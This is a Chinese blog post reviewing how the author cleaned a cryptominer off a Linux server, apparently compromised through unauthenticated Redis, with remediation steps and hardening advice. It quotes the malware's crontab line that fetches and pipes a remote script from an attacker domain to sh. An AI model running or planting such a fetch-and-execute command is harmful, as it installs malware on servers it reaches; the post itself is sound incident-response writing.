knight-zhou
knight-zhou

挖矿程序复盘

背景:

收到朋友的委托,告诉我服务器中毒了,需要我去服务器上清除病毒

景象:

通过账号和密码登录服务器, 发现cpu居高不下,而且定时任务里有计划任务,干掉计划任务,又会立马生成

*/15 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

初步分析:

删除了计划任务又自动加上了,肯定是有个后台进程(后面)没有清除,没有干掉导致的,于是我在浏览器里打开 lsd.systemten.org 进行访问,发现是有个shell脚本,具体可以看 cron.sh

初步分析这个shell我们可以得出:

  1. 他在写crontab,tmp目录给了任何用户读写权限
  2. kill 掉了安全工具
  3. 采用了cdn,那么连接ip就是不固定的
  4. 加了秘钥能进行免秘钥访问

---- 登录服务器进行排查:

[root@xxoo]# ps -aux
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0  25412  1648 ?        Ss    2018   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S     2018   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S     2018   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S     2018   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S     2018   0:00 [stopper/0]
root         6  0.0  0.0      0     0 ?        S     2018   0:00 [watchdog/0]
root         7  0.0  0.0      0     0 ?        S     2018   0:00 [migration/1]
root         8  0.0  0.0      0     0 ?        S     2018   0:00 [stopper/1]
root         9  0.0  0.0      0     0 ?        S     2018   0:00 [ksoftirqd/1]
root        10  0.0  0.0      0     0 ?        S     2018   0:00 [watchdog/1]
root        11  0.0  0.0      0     0 ?        S     2018   0:00 [events/0]
root        12  0.0  0.0      0     0 ?        S     2018   0:00 [events/1]
root        13  0.0  0.0      0     0 ?        S     2018   0:00 [events/0]
root        14  0.0  0.0      0     0 ?        S     2018   0:00 [events/1]
root        15  0.0  0.0      0     0 ?        S     2018   0:00 [events_long/0]
root        16  0.0  0.0      0     0 ?        S     2018   0:00 [events_long/1]
root        17  0.0  0.0      0     0 ?        S     2018   0:00 [events_power_ef]
root        18  0.0  0.0      0     0 ?        S     2018   0:00 [events_power_ef]
root        19  0.0  0.0      0     0 ?        S     2018   0:00 [cgroup]
root        20  0.0  0.0      0     0 ?        S     2018   0:00 [khelper]
root        21  0.0  0.0      0     0 ?        S     2018   0:00 [netns]
root        22  0.0  0.0      0     0 ?        S     2018   0:00 [async/mgr]
root        23  0.0  0.0      0     0 ?        S     2018   0:00 [pm]
root        24  0.0  0.0      0     0 ?        S     2018   0:00 [sync_supers]
root        25  0.0  0.0      0     0 ?        S     2018   0:00 [bdi-default]
root        26  0.0  0.0      0     0 ?        S     2018   0:00 [kintegrityd/0]
root        27  0.0  0.0      0     0 ?        S     2018   0:00 [kintegrityd/1]
root        28  0.0  0.0      0     0 ?        S     2018   0:00 [kblockd/0]
root        29  0.0  0.0      0     0 ?        S     2018   0:00 [kblockd/1]
root        30  0.0  0.0      0     0 ?        S     2018   0:00 [kacpid]
root        31  0.0  0.0      0     0 ?        S     2018   0:00 [kacpi_notify]
root        32  0.0  0.0      0     0 ?        S     2018   0:00 [kacpi_hotplug]
root        33  0.0  0.0      0     0 ?        S     2018   0:00 [ata_aux]
root        34  0.0  0.0      0     0 ?        S     2018   0:00 [ata_sff/0]
root        35  0.0  0.0      0     0 ?        S     2018   0:00 [ata_sff/1]
root        36  0.0  0.0      0     0 ?        S     2018   0:00 [ksuspend_usbd]
root        37  0.0  0.0      0     0 ?        S     2018   0:00 [khubd]
root        38  0.0  0.0      0     0 ?        S     2018   0:00 [kseriod]
root        39  0.0  0.0      0     0 ?        S     2018   0:00 [md/0]
root        40  0.0  0.0      0     0 ?        S     2018   0:00 [md/1]
root        41  0.0  0.0      0     0 ?        S     2018   0:00 [md_misc/0]
root        42  0.0  0.0      0     0 ?        S     2018   0:00 [md_misc/1]
root        43  0.0  0.0      0     0 ?        S     2018   0:00 [linkwatch]
root        46  0.0  0.0      0     0 ?        S     2018   0:00 [khungtaskd]
root        47  0.0  0.0      0     0 ?        S     2018   0:00 [kswapd0]
root        48  0.0  0.0      0     0 ?        SN    2018   0:00 [ksmd]
root        49  0.0  0.0      0     0 ?        SN    2018   0:00 [khugepaged]
root        50  0.0  0.0      0     0 ?        S     2018   0:00 [aio/0]
root        51  0.0  0.0      0     0 ?        S     2018   0:00 [aio/1]
root        52  0.0  0.0      0     0 ?        S     2018   0:00 [crypto/0]
root        53  0.0  0.0      0     0 ?        S     2018   0:00 [crypto/1]
root        60  0.0  0.0      0     0 ?        S     2018   0:00 [kthrotld/0]
root        61  0.0  0.0      0     0 ?        S     2018   0:00 [kthrotld/1]
root        63  0.0  0.0      0     0 ?        S     2018   0:00 [kpsmoused]
root        64  0.0  0.0      0     0 ?        S     2018   0:00 [usbhid_resumer]
root        65  0.0  0.0      0     0 ?        S     2018   0:00 [deferwq]
root        97  0.0  0.0      0     0 ?        S     2018   0:00 [kdmremove]
root        98  0.0  0.0      0     0 ?        S     2018   0:00 [kstriped]
root       269  0.0  0.0      0     0 ?        S     2018   0:00 [scsi_eh_0]
root       270  0.0  0.0      0     0 ?        S     2018   0:00 [scsi_eh_1]
root       286  0.0  0.0      0     0 ?        S     2018   0:00 [virtio-blk]
root       340  0.0  0.0      0     0 ?        S     2018   0:00 [jbd2/vda1-8]
root       341  0.0  0.0      0     0 ?        S     2018   0:00 [ext4-dio-unwrit]
root       425  0.0  0.0  14940   968 ?        S<s   2018   0:00 /sbin/udevd -d
root       557  0.0  0.0      0     0 ?        S     2018   0:00 [virtio-net]
root       562  0.0  0.0      0     0 ?        S     2018   0:00 [vballoon]
root       659  0.0  0.0  14908   968 ?        S<    2018   0:00 /sbin/udevd -d
root       688  0.0  0.0      0     0 ?        S     2018   0:00 [kjournald]
root       721  0.0  0.0      0     0 ?        S     2018   0:00 [kauditd]
root       943  0.0  0.0      0     0 ?        S     2018   0:00 [flush-252:0]
root       973  0.0  0.0  15300   732 ?        Ss    2018   0:00 /sbin/dhclient -H ISales-gzcaizhidanao -1 -q -cf /etc/dhcp/dhclient-eth0.
root      1022  0.0  0.0  35948   928 ?        S<sl  2018   0:00 auditd
root      1044  0.0  0.0 259528  1752 ?        Sl    2018   0:00 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
root      1059  0.0  0.0  24432   828 ?        Ss    2018   0:00 irqbalance --pid=/var/run/irqbalance.pid
root      1163  0.0  0.0  36076  4472 ?        Ssl   2018   0:03 /usr/local/aegis/aegis_update/AliYunDunUpdate
root      1202  0.0  0.1 126608 11492 ?        S<sl  2018   0:14 /usr/local/aegis/aegis_client/aegis_10_65/AliYunDun
root      1228  0.0  0.0      0     0 ?        S     2018   0:00 [cqueue]
root      1266  0.0  0.0  14936   944 ?        S<    2018   0:00 /sbin/udevd -d
ntp       1397  0.0  0.0  34728  1848 ?        Ss    2018   0:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root      1549  0.0  0.0  85072  3504 ?        Ss    2018   0:00 /usr/libexec/postfix/master
postfix   1559  0.0  0.0  85324  3648 ?        S     2018   0:00 qmgr -l -t fifo -u
root      1586  0.0  0.0  25224   576 ?        Ss    2018   0:00 /usr/sbin/atd
root      1606  0.0  0.0  82344  2808 ?        Ssl   2018   0:00 /usr/sbin/aliyun-service
[root@ISales-oo xx]#

通过经验查看各个路径,首先查看/etc/bashrc:
挖矿程序复盘_第1张图片

发现有redis,这个可能跟redis 未授权漏洞攻击手法一样
在这里插入图片描述

通过url搜索发现别人也遇到了 https://www.cnblogs.com/kobexffx/p/11000337.html

执行查杀脚本发现还是会在计划任务生成,所以要断网才能彻底去根除,于是我尝试些hosts 强制解析crontab的域名

发现,他自动给我吧hosts给删除了强制解析,因为是通过wget下载的 所以我直接把wget重命名,然后
yum remove postfix -y 先把crontab 卸载掉,再继续找木马,然后我在防火墙把这个域名解析的ip给禁掉

-A OUTPUT -d 95.215.19.12/32 -j REJECT --reject-with icmp-port-unreachable

然后我从正常的机器把ps命令拷贝过来进行分析(因为病毒把系统命令给劫持了)

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

所以我把sshd 删掉 然后替换掉正常的,看/etc/passwd 有没有可疑账户 发现也没有

在 /usr/local/sbin 下发现很多隐藏文件,这些就是木马,劫持了系统命令
挖矿程序复盘_第2张图片

删掉之后发现cpu降下来了,之前截图的apache等可疑进程干掉然后删除掉文件也正常了

结论:

攻击类型:
  可能属于挖矿程序

漏洞利用:
 可能是reidis 未授权认证漏洞

防护建议:
 (1)Redis,mongodb 启用密码访问 或者监听不要用0.0.0.0,监听使用本机ip
 (2)应用采用普通用户启动 不采用 root启动
 (3)防火墙启动 ,不开放的端口进行关闭
  (4)修改密码以及修改ssh端口
  (5)部署架构: 数据库只有内网地址,不能上网. 应用和数据库分离开

你可能感兴趣的:(系统安全)

  • 信息系统安全相关概念(上) YuanDaima2048 课程笔记基础概念安全信息安全笔记
    文章总览:YuanDaiMa2048博客文章总览下篇:信息系统安全相关概念(下)信息系统安全相关概念[上]信息系统概述信息系统信息系统架构信息系统发展趋势:信息系统日趋大型化、复杂化信息系统面临的安全威胁信息系统安全架构设计--以云计算为例信息系统安全需求及安全策略自主访问控制策略DAC强制访问控制策略MAC信息系统概述信息系统用于收集、存储和处理数据以及传递信息、知识和数字产品的一组集成组件。几
  • 信息系统安全相关概念(下) YuanDaima2048 基础概念课程笔记安全
    文章总览:YuanDaiMa2048博客文章总览上篇指路:信息系统安全相关概念(上)信息系统安全相关概念[下]信息系统风险评估安全风险评估信息系统等级保护网络安全法等级保护等级保护工作流程环境安全信息系统风险评估安全风险评估对信息系统整体安全态势的感知和对重大安全事件的预警,实现“事前能预防,事中能控制,事后能处理”。安全风险组成的四要素:信息系统资产(Asset)信息系统脆弱性(Vulnerab
  • python logging模块默认日志级别_一看就懂,Python 日志 logging 模块详解及应用 路易·罗莎 pythonlogging模块默认日志级别
    日志概述百度百科的日志概述:Windows网络操作系统都设计有各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时,这些日志文件通常会记录下我们操作的一些相关内容,这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测,系统就会在安全日志
  • 等保测评中的关键技术挑战与应对策略 亿林数据 网络安全等保测评
    在信息安全领域,等保测评(信息安全等级保护测评)作为确保信息系统安全性的重要手段,其过程中不可避免地会遇到一系列技术挑战。这些挑战不仅考验着企业的技术实力,也对其安全管理水平提出了更高要求。本文将深入探讨等保测评中的关键技术挑战,并提出相应的应对策略。一、等保测评中的关键技术挑战1.复杂系统架构的评估难度随着信息技术的快速发展,企业信息系统的架构日益复杂,包括分布式系统、微服务架构、云计算环境等。
  • 安全隔离上网的有效途径:沙箱 Canon_YK 零信任防泄密源代码防泄密安全网络服务器网络安全web安全
    在数字化浪潮日益汹涌的今天,网络安全成为了不可忽视的重要议题。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。本文旨在深入探讨沙箱技术如何做到隔离上网,从而为用户提供一个安全、可靠的上网环境。一、沙箱技术的原理与定义沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心
  • 利用zabbix监控ogg进程(Windows平台) Linux运维老纪 万象人生-坚守Zabbix企业级监控岗位运维开发服务器云计算zabbixlinux
    欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。推荐:Linux运维老纪的首页,持续学习,不断总结,共同进步,活到老学到老导航剑指大厂系列:全面总结运维核心技术:系统基础、数据库、网路技术、系统安全、自动化运维、容器技术、监控工具、脚本编程、云服务等。常用运维工具系列:常用的运维开发工具,zab
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络安全运维
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • NISP 一级 —— 考证笔记合集 SRC_BLUE_17 网络安全资源导航#网络安全相关笔记笔记网络安全证书获取NISP
    该笔记为导航目录,在接下来一段事件内,我会每天发布我关于考取该证书的相关笔记。当更新完成后,此条注释会被删除。第一章信息安全概述1.1信息与信息安全1.2信息安全威胁1.3信息安全发展阶段与形式1.4信息安全保障1.5信息系统安全保障第二章信息安全基础技术2.1密码学2.2数字证书与公钥基础设施2.3身份认证2.4访问控制2.5安全审计第三章网络安全防护技术3.1网络基础知识3.2网络安全威胁3.
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络网络安全
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • linux-用户与权限管理-用户管理 Flying_Fish_Xuan linux运维服务器
    Linux用户与权限管理——用户管理详解在Linux系统中,用户管理和权限控制是保证系统安全和资源有效利用的基础。用户管理涉及到创建用户、删除用户、修改用户属性、用户组管理等内容。1.Linux用户体系概述在Linux系统中,所有操作都与用户相关联。用户可以是人、进程或系统程序,操作系统通过用户身份来进行权限和资源的分配。Linux系统将用户分为以下几类:超级用户(Superuser):通常是ro
  • 干货 ‖ 三分钟让你区分“等级保护、风险评估和安全测评” 等保星视界
    接触安全行业的大家大概会经常遇到这几个关键词,“等级保护”、“风险评估”、“系统安全评测”,这都是当前国家信息安全保障建设体系中的热门话题。但是肯定有很多小伙伴还是对他们之间的区别和联系不是那么明确,今天小编就来帮大家缕一缕。一、三者的概念介绍A、等级保护概念介绍:等级保护全名信息安全等级保护,是指对国家各类信息系统分等级进行安全保护,对信息系统中的安全产品进行等级管理,对信息系统中的信息安全事件
  • 【python】最新版小红书js逆向拿到数据,非常详细教程(附完整代码) 景天科技苑 爬虫副业实战零基础进阶教学pythonjs逆向小红书逆向python爬虫
    ✨✨欢迎大家来到景天科技苑✨✨养成好习惯,先赞后看哦~作者简介:景天科技苑《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN全栈领域优质创作者,掘金优秀博主,51CTO博客专家等。《博客》:Python全栈,前后端开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi,flask等框架,linux,shell脚本等实操经验,网站搭
  • 2023 下半年信息安全工程师考试真题答案 rockmelodies 安全网络安全
    一、单项选择如下有关信息安全管理员职责旳论述,不对旳旳是()A.信息安全管理员应当对网络旳总体安全布局进行规划B.信息安全管理员应当对信息系统安全事件进行处理C.信息安全管理员应当负责为顾客编写安全应用程序D.信息安全管理员应当对安全设备进行优化配置国家密码管理局于2023年公布了“无线局域网产品须使用旳系列密码算法”,其中规定密钥协商算法应使用旳是()A.DHB.ECDSAC.ECDHD.CPK
  • C/S模式优缺点 nxyc_twz 系统分析师服务器任务平台
    C/S模式优缺点优点:1.结构简单,系统中不同类型的任务分别由客户和服务器承担,有利于发挥不同机器平台的优势;2.支持分布式、并发环境,特别是当客户和服务器之间的关系是多对多时,可以有效地提高资源的利用率和共享程度;3.服务器集中管理资源,有利于权限控制和系统安全。•缺点:在大多数client-server风格的系统中,构件之间的连接通过(远程)过程调用,接近于代码一级,表达能力较弱
  • 信息系统安全体系设计 不戴眼镜的朱学长 系统架构论文笔记安全
    本人任职某运营商解决方案架构师职位,因工作需要考取了软考的系统架构师认证,并顺利的通过了考试一点点心得分享如下:选择题(就是刷,刷到你出肌肉记忆,闭眼就知道选项)案例题(就是背,很多简答题的回答都是公式化的比如看到活动图和状态图就知道它俩有啥区别,刚开始可能会有点恼火,准备的过程可能就像背面试题一样,很多东西是通的)论文题(最讲究技巧和套路的一门考试,相信很多高项的同学都是挂在论文上了,而架构师的
  • 【python】懂车帝字体反爬逐层解密案例(附完整代码) 景天科技苑 爬虫副业实战零基础进阶教学python开发语言字体反爬懂车帝python字体反爬
    ✨✨欢迎大家来到景天科技苑✨✨养成好习惯,先赞后看哦~作者简介:景天科技苑《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN全栈领域优质创作者,掘金优秀博主,51CTO博客专家等。《博客》:Python全栈,PyQt5和Tkinter桌面应用开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi,flask等框架,云原生k8s,l
  • 浙江省某市监局 API 敏感数据保护与全链路数据安全管控实践 原点安全 数据安全
    背景随着政务服务数字化转型的加速,政府信息化建设、大数据分析应用以及智慧监管建设等现代化、智能化转型持续推进,新的数据安全风险也暗藏其中。为加强公共数据安全体系建设,提升数据安全主动防御能力、监测预警能力、应急处置能力、协同治理能力,切实防范公共数据篡改、泄露、滥用。2023年,浙江省市网信办联合机要保密局、大数据局联合发布《政务信息系统安全自查对照表》,要求各部门开展数据安全自检自查工作。N市市
  • 【python】flask执行上下文context,请求上下文和应用上下文原理解析 景天科技苑 flask框架零基础进阶应用实战教学pythonflask开发语言请求上下文应用上下文
    ✨✨欢迎大家来到景天科技苑✨✨养成好习惯,先赞后看哦~作者简介:景天科技苑《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN新星创作者,掘金优秀博主,51CTO博客专家等。《博客》:Python全栈,前后端开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi,flask等框架,linux,shell脚本等实操经验,网站搭建,面试
  • 什么是IO多路复用?其原理和用途是什么? 听说唐僧不吃肉 LinuxIO多路复用
    什么是IO?IO:Input/Output,即数据的读取(接收)/写入(发送)操作,针对不同的数据存储媒介,大致可以分为网络IO和磁盘IO两种。在Linux系统中,为了保证系统安全,操作系统将虚拟内存划分为内核空间和用户空间两部分。因此用户进程无法直接操作IO设备资源,需要通过系统调用完成对应的IO操作。1、I/O多路复用简介I/O多路复用(I/OMultiplexing)是一种高效处理多个I/O
  • 【python】Python实现XGBoost算法的详细理论讲解与应用实战 景天科技苑 python轻松入门基础语法到高阶实战教学python算法开发语言XGBoost算法XGBoostpython实现XGBoost人工智能
    ✨✨欢迎大家来到景天科技苑✨✨养成好习惯,先赞后看哦~作者简介:景天科技苑《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN全栈领域优质创作者,掘金优秀博主,51CTO博客专家等。《博客》:Python全栈,PyQt5和Tkinter桌面开发,小程序开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi,flask等框架,云原生K
  • 【python】python代码打包工具cx_Freeze的介绍、原理、用法及实战案例分析 景天科技苑 python轻松入门基础语法到高阶实战教学python开发语言cx_Freezepython代码打包python打包成exe
    ✨✨欢迎大家来到景天科技苑✨✨养成好习惯,先赞后看哦~作者简介:景天科技苑《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN全栈领域优质创作者,掘金优秀博主,51CTO博客专家等。《博客》:Python全栈,PyQt5和Tkinter桌面开发,小程序开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi,flask等框架,云原生K
  • 网络安全学习路线图(2024版详解) 白帽子008 web安全学习安全网络安全运维
    近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的网络安全学习路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的网络安全学习路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸,还能够系统化学习,提升自己的后期竞争力。第一阶段:数通安全Windows系统安全1.企业资产安全规
  • 零基础转行学网络安全怎么样?能找到什么样的工作? 爱吃小石榴16 web安全安全人工智能运维学习
    网络安全对于现代社会来说变得越来越重要,但是很多人对于网络安全的知识却知之甚少。那么,零基础小白可以学网络安全吗?答案是肯定的。零基础转行学习网络安全是完全可行的,但需要明确的是,网络安全是一个既广泛又深入的领域,包含了网络协议、系统安全、应用安全、密码学、渗透测试、漏洞挖掘、安全编程、安全运维等多个方面。。网络安全是一个快速发展的领域,对专业人才的需求不断增长。以下是一些关于零基础转行学习网络安
  • 网络安全笔记-信息安全工程师与网络安全工程师考试大纲(附:Web安全大纲)_信息网络安全师认证(inspc)培训工作大纲 程序员安安 web安全笔记网络服务器数据库网络安全安全
    Web安全大纲2024信息安全工程师考试大纲1、考试目标通过本考试的合格人员能够掌握网络信息安全的基础知识和技术原理;根据国家网络信息安全相关法律法规及业务安全保障要求,能够规划、设计信息系统安全方案,能够配置和维护常见的网络安全设备及系统;能够对信息系统的网络安全风险进行监测和分析,并给出网络安全风险问题的整改建议;能够协助相关部门对单位的信息系统进行网络安全审计和网络安全事件调查;能够对网络信
  • 从零开始的网络安全--Windows系统安全(1) 程序员--青青 web安全windows系统安全
    Window系统安全1一、用户账户基础1、用户账户概述用户账户用来记录用户的用户名和口令、隶属的组等信息每个用户账户包含唯一的登录名和对应的密码不同的用户身份拥有不同的权限操作系统根据SID识别不同用户每个用户拥有唯一安全标识符(SID)用户权限通过用户的SID来记录查看命令为:whoami/user![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b
  • 网络安全售前入门09安全服务——安全加固服务 努力工作的网安人 安全服务安全web安全oracle
    目录1.服务概述2.流程及工具2.1服务流程2.2服务工具3.服务内容4.服务方式5.风险规避措施6.服务输出1.服务概述安全加固服务是参照风险评估、等保测评、安全检查等工作的结果,基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践,为客户提供完善的安全加固方案,并在客户侧反馈完成加固后,提供二次评估服务,从而帮助客户达到修补信息系统脆弱性,提高系统安全性,满
  • 网络安全售前入门10安全服务——安全培训服务 努力工作的网安人 安全服务web安全安全网络
    目录1.服务概述2.流程及工具服务流程涉及工具与产品3.服务内容4.服务方式5.风险规避措施6.服务输出7.项目价值1.服务概述对XX人员进行安全意识培训,提高XX人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。利用小视频或者其他新媒体手段提供协助XX科普网络安全相关知识。2.流程及工具服务流程安全培训的实施流程主要分为明确
  • 【云原生】Kubernetes中如何通过Pod名称查询Docker容器ID,通过Docker容器ID查询Pod名称? 景天科技苑 云原生K8S零基础到进阶实战云原生kubernetesdockerdocker容器id查询pod查询docker与pod互查
    ✨✨欢迎大家来到景天科技苑✨✨养成好习惯,先赞后看哦~作者简介:景天科技苑《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN全栈领域优质创作者,掘金优秀博主,51CTO博客专家等。《博客》:Python全栈,前后端开发,小程序开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi,flask等框架,云原生k8s,linux,she
  • 重新定义失败 Real_man
    长大之后,很多人都害怕失败,掩盖失败,只把自己光鲜亮丽的一面展示出来,对犯过的错误视而不见,这当时会让我们心里好受一点,自我感受做的还不错。不过这带来了一个问题,那就是我们进步的速度将会大大降低。失败是学习的途径,有时可能是唯一的途径,科研中,错误指明了理论的改革方向,体育运动中,错误为训练指明了改进的模板,航空界,每次事故都是推进系统安全的机会。有一个科学实验:分为两组学生,分别给一些题目和课程
  • 物联网架构之HBase Linux运维老纪 一蹴而就揭秘物联网“点石成金”的魔法架构hbase运维开发linux云计算
    欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。推荐:Linux运维老纪的首页,持续学习,不断总结,共同进步,活到老学到老导航剑指大厂系列:全面总结运维核心技术:系统基础、数据库、网路技术、系统安全、自动化运维、容器技术、监控工具、脚本编程、云服务等。常用运维工具系列:常用的运维开发工具,zab
  • github中多个平台共存 jackyrong github
    在个人电脑上,如何分别链接比如oschina,github等库呢,一般教程之列的,默认 ssh链接一个托管的而已,下面讲解如何放两个文件 1) 设置用户名和邮件地址 $ git config --global user.name "xx" $ git config --global user.email "[email protected]"
  • ip地址与整数的相互转换(javascript) alxw4616 JavaScript
    //IP转成整型 function ip2int(ip){ var num = 0; ip = ip.split("."); num = Number(ip[0]) * 256 * 256 * 256 + Number(ip[1]) * 256 * 256 + Number(ip[2]) * 256 + Number(ip[3]); n
  • 读书笔记-jquey+数据库+css chengxuyuancsdn htmljqueryoracle
    1、grouping ,group by rollup, GROUP BY GROUPING SETS区别 2、$("#totalTable tbody>tr td:nth-child(" + i + ")").css({"width":tdWidth, "margin":"0px", &q
  • javaSE javaEE javaME == API下载 Array_06 java
    oracle下载各种API文档: http://www.oracle.com/technetwork/java/embedded/javame/embed-me/documentation/javame-embedded-apis-2181154.html JavaSE文档: http://docs.oracle.com/javase/8/docs/api/ JavaEE文档: ht
  • shiro入门学习 cugfy javaWeb框架
    声明本文只适合初学者,本人也是刚接触而已,经过一段时间的研究小有收获,特来分享下希望和大家互相交流学习。 首先配置我们的web.xml代码如下,固定格式,记死就成 <filter>         <filter-name>shiroFilter</filter-name> &nbs
  • Array添加删除方法 357029540 js
         刚才做项目前台删除数组的固定下标值时,删除得不是很完整,所以在网上查了下,发现一个不错的方法,也提供给需要的同学。 //给数组添加删除             Array.prototype.del = function(n){
  • navigation bar 更改颜色 张亚雄 IO
    今天郁闷了一下午,就因为objective-c默认语言是英文,我写的中文全是一些乱七八糟的样子,到不是乱码,但是,前两个自字是粗体,后两个字正常体,这可郁闷死我了,问了问大牛,人家告诉我说更改一下字体就好啦,比如改成黑体,哇塞,茅塞顿开。       翻书看,发现,书上有介绍怎么更改表格中文字字体的,代码如下    
  • unicode转换成中文 adminjun unicode编码转换
      在Java程序中总会出现\u6b22\u8fce\u63d0\u4ea4\u5fae\u535a\u641c\u7d22\u4f7f\u7528\u53cd\u9988\uff0c\u8bf7\u76f4\u63a5这个的字符,这是unicode编码,使用时有时候不会自动转换成中文就需要自己转换了使用下面的方法转换一下即可。 /** * unicode 转换成 中文
  • 一站式 Java Web 框架 firefly aijuans Java Web
    Firefly是一个高性能一站式Web框架。 涵盖了web开发的主要技术栈。 包含Template engine、IOC、MVC framework、HTTP Server、Common tools、Log、Json parser等模块。 firefly-2.0_07修复了模版压缩对javascript单行注释的影响,并新增了自定义错误页面功能。 更新日志: 增加自定义系统错误页面功能
  • 设计模式——单例模式 ayaoxinchao 设计模式
    定义          Java中单例模式定义:“一个类有且仅有一个实例,并且自行实例化向整个系统提供。”   分析          从定义中可以看出单例的要点有三个:一是某个类只能有一个实例;二是必须自行创建这个实例;三是必须自行向系统提供这个实例。   &nb
  • Javascript 多浏览器兼容性问题及解决方案 BigBird2012 JavaScript
    不论是网站应用还是学习js,大家很注重ie与firefox等浏览器的兼容性问题,毕竟这两中浏览器是占了绝大多数。 一、document.formName.item(”itemName”) 问题 问题说明:IE下,可以使用 document.formName.item(”itemName”) 或 document.formName.elements ["elementName&quo
  • JUnit-4.11使用报java.lang.NoClassDefFoundError: org/hamcrest/SelfDescribing错误 bijian1013 junit4.11单元测试
            下载了最新的JUnit版本,是4.11,结果尝试使用发现总是报java.lang.NoClassDefFoundError: org/hamcrest/SelfDescribing这样的错误,上网查了一下,一般的解决方案是,换一个低一点的版本就好了。还有人说,是缺少hamcrest的包。去官网看了一下,如下发现:    
  • [Zookeeper学习笔记之二]Zookeeper部署脚本 bit1129 zookeeper
    Zookeeper伪分布式安装脚本(此脚本在一台机器上创建Zookeeper三个进程,即创建具有三个节点的Zookeeper集群。这个脚本和zookeeper的tar包放在同一个目录下,脚本中指定的名字是zookeeper的3.4.6版本,需要根据实际情况修改):   #!/bin/bash #!!!Change the name!!! #The zookeepe
  • 【Spark八十】Spark RDD API二 bit1129 spark
    coGroup package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} import org.apache.spark.SparkContext._ object CoGroupTest_05 { def main(args: Array[String]) { v
  • Linux中编译apache服务器modules文件夹缺少模块(.so)的问题 ronin47 modules
    在modules目录中只有httpd.exp,那些so文件呢? 我尝试在fedora core 3中安装apache 2. 当我解压了apache 2.0.54后使用configure工具并且加入了 --enable-so 或者 --enable-modules=so (两个我都试过了) 去make并且make install了。我希望在/apache2/modules/目录里有各种模块,
  • Java基础-克隆 BrokenDreams java基础
            Java中怎么拷贝一个对象呢?可以通过调用这个对象类型的构造器构造一个新对象,然后将要拷贝对象的属性设置到新对象里面。Java中也有另一种不通过构造器来拷贝对象的方式,这种方式称为 克隆。         Java提供了java.lang.
  • 读《研磨设计模式》-代码笔记-适配器模式-Adapter bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * 适配器模式解决的主要问题是,现有的方法接口与客户要求的方法接口不一致 * 可以这样想,我们要写这样一个类(Adapter): * 1.这个类要符合客户的要求 ---> 那显然要
  • HDR图像PS教程集锦&心得 cherishLC PS
    HDR是指高动态范围的图像,主要原理为提高图像的局部对比度。 软件有photomatix和nik hdr efex。 一、教程 叶明在知乎上的回答: http://www.zhihu.com/question/27418267/answer/37317792 大意是修完后直方图最好是等值直方图,方法是HDR软件调一遍,再结合不透明度和蒙版细调。 二、心得 1、去除阴影部分的
